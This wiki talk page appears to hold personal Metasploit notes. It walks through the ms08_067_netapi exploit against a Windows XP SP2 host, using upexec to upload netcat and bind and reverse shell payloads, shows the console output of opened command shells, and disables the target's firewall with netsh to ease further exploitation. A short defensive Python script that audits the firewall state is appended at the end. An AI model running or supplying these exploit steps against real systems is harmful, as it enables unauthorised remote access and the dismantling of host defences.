User talk:Stboon

Using the NC netcat executable with upexec payload

 * 1) Use the ms08_067_netapi exploit
 * 2) Set the payload to windows/upexec/bind_tcp
 * 3) Set PEXEC to the path of the nc.exe netcat binary

msf exploit(ms08_067_netapi) > set payload windows/upexec/bind_tcp

msf exploit(ms08_067_netapi) > set PEXEC /mnt/sdb2_removable/changes/windows-binaries/tools/nc.exe

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

The bind connection was blocked by the Windows firewall, so the reverse shell handler is used below:

msf exploit(ms08_067_netapi) > set payload windows/upexec/reverse_tcp

msf exploit(ms08_067_netapi) > set PEXEC /mnt/sdb2_removable/changes/windows-binaries/tools/nc.exe

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Sending stage (396 bytes)

[*] Sleeping before handling stage...

[*] Uploading executable (59392 bytes)...

[*] Executing uploaded file...

[*] Command shell session 5 opened (192.168.1.101:4444 -> 192.168.1.100:1044)

Cmd line:

(Type the nc.exe command line parameters at the "Cmd line:" prompt above, once the upexec stage has run. There is no option in the msf console for specifying the parameters of the binary that is to be uploaded.)

Cmd line: -l -n -e cmd.exe -p 1080 -s 192.168.1.100 -vv

Start a new shell on the Linux host to connect to the uploaded nc.exe listener:

bt ~ # cd /usr/bin/

bt ~ # nc -n 192.168.1.100 1080

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

All of this happens over port 445 with the ms08_067_netapi exploit. It will not work with the Windows firewall enabled: you can still get a reverse shell to upload and execute the netcat binary, but the firewall will block the inbound nc (netcat) connection to port 1080.

A little bit about firewalls
(Using the windows/shell/bind_tcp payload)

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST                      no        The target address

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Sending stage (474 bytes)

[*] Command shell session 1 opened (192.168.1.101:48127 -> 192.168.1.100:4444)

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

(You would get a shell like this if the Windows firewall was disabled... however:)

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[-] Exploit failed:

[*] Exploit completed, but no session was created.

(If the Windows firewall was enabled you would get this instead.)

(Using the reverse payload instead:)

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.1.100    yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.101

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1030)

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                          = Standard

Operational mode                 = Disable

Exception mode                   = Disable

Multicast/broadcast response mode = Enable

Notification mode                = Enable

Group policy version             = None

Remote admin mode                = Disable

Ports currently open on all network interfaces:

Port  Protocol  Version  Program
----  --------  -------  -------
137   UDP       IPv4     (null)

139   TCP       IPv4     (null)

138   UDP       IPv4     (null)

3389  TCP       IPv4     (null)

445   TCP       IPv4     (null)

2869  TCP       IPv4     (null)

1900  UDP       IPv4     (null)

C:\WINDOWS\system32>netsh firewall set opmode disable

netsh firewall set opmode disable

Ok.

(We can disable the firewall this way to facilitate other exploitation)
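As an added example (not part of these notes or of the Metasploit project), the following Python script parses the output of "netsh firewall show state" shown above and reports, from a defender's point of view, the conditions that the bind-shell and netcat-listener attempts on this page depend on: whether the firewall's operational mode is enabled, which listening ports are listed as exceptions, and therefore which inbound connections (445 for SMB, 4444 for the bind handler, 1080 for the uploaded nc.exe) the host would accept. The sample text is a copy of the page's output embedded as constructed input; the reachability rule (firewall disabled: everything reachable; firewall enabled: only listed exceptions reachable) is a simplifying assumption used for the audit, and the function and variable names are this example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: a copy of the `netsh firewall show state` output
# shown on this page (Windows XP SP2), so the script runs offline.
SAMPLE_STATE = """\
Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Disable
Exception mode                    = Disable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = None
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
137    UDP       IPv4     (null)
139    TCP       IPv4     (null)
138    UDP       IPv4     (null)
3389   TCP       IPv4     (null)
445    TCP       IPv4     (null)
2869   TCP       IPv4     (null)
1900   UDP       IPv4     (null)
"""


@dataclass
class FirewallState:
    settings: dict = field(default_factory=dict)      # "Operational mode" -> "Disable", ...
    open_ports: list = field(default_factory=list)    # [(port, "TCP"|"UDP"), ...]

    @property
    def enabled(self) -> bool:
        return self.settings.get("Operational mode", "").lower() == "enable"


# "Key = Value" lines of the status block.
_KV = re.compile(r"^(?P<key>[A-Za-z/ ]+?)\s*=\s*(?P<val>.+?)\s*$")
# Rows of the open-ports table.
_PORT = re.compile(r"^(?P<port>\d+)\s+(?P<proto>TCP|UDP)\s+IPv[46]\s+(?P<prog>.+?)\s*$")


def parse_state(text: str) -> FirewallState:
    """Parse `netsh firewall show state` output into settings and open ports."""
    state = FirewallState()
    for raw in text.splitlines():
        line = raw.strip()
        m = _PORT.match(line)
        if m:
            state.open_ports.append((int(m.group("port")), m.group("proto")))
            continue
        m = _KV.match(line)
        if m:
            state.settings[m.group("key").strip()] = m.group("val")
    return state


def inbound_allowed(state: FirewallState, port: int, proto: str = "TCP") -> bool:
    """Simplified model (assumption): with the firewall disabled every listener is
    reachable; with it enabled only the listed exceptions accept inbound traffic."""
    if not state.enabled:
        return True
    return (port, proto) in state.open_ports


# TCP services worth flagging on a workstation; 445 is the vector used on this page.
NOISY_TCP = {139: "NetBIOS session", 445: "SMB (ms08_067_netapi vector)", 3389: "RDP"}


def audit(state: FirewallState) -> list:
    """Return human-readable findings about the host's inbound exposure."""
    findings = []
    if not state.enabled:
        findings.append("Operational mode is Disable: every listener on the host is reachable")
    for port, proto in state.open_ports:
        if proto == "TCP" and port in NOISY_TCP:
            findings.append(f"{port}/TCP listed as open: {NOISY_TCP[port]}")
    return findings


def with_operational_mode(text: str, mode: str) -> str:
    """Helper for what-if checks: rewrite the Operational mode value in the raw output."""
    return re.sub(r"(Operational mode\s*=\s*)\w+", r"\g<1>" + mode, text)


if __name__ == "__main__":
    for label, text in (("as captured", SAMPLE_STATE),
                        ("if firewall enabled", with_operational_mode(SAMPLE_STATE, "Enable"))):
        st = parse_state(text)
        print(f"[{label}] firewall enabled: {st.enabled}")
        for finding in audit(st):
            print("  -", finding)
        for port in (445, 4444, 1080):
            verdict = "reachable" if inbound_allowed(st, port) else "blocked"
            print(f"  inbound {port}/TCP: {verdict}")
```

Run against the captured output, the script reports the firewall as disabled with 139, 445 and 3389 listed; rerun with the operational mode flipped to Enable, it shows why the page's bind handler on 4444 and the nc.exe listener on 1080 are blocked while the SMB exploit over 445 still goes through, which is exactly the exposure a host hardening check should look for.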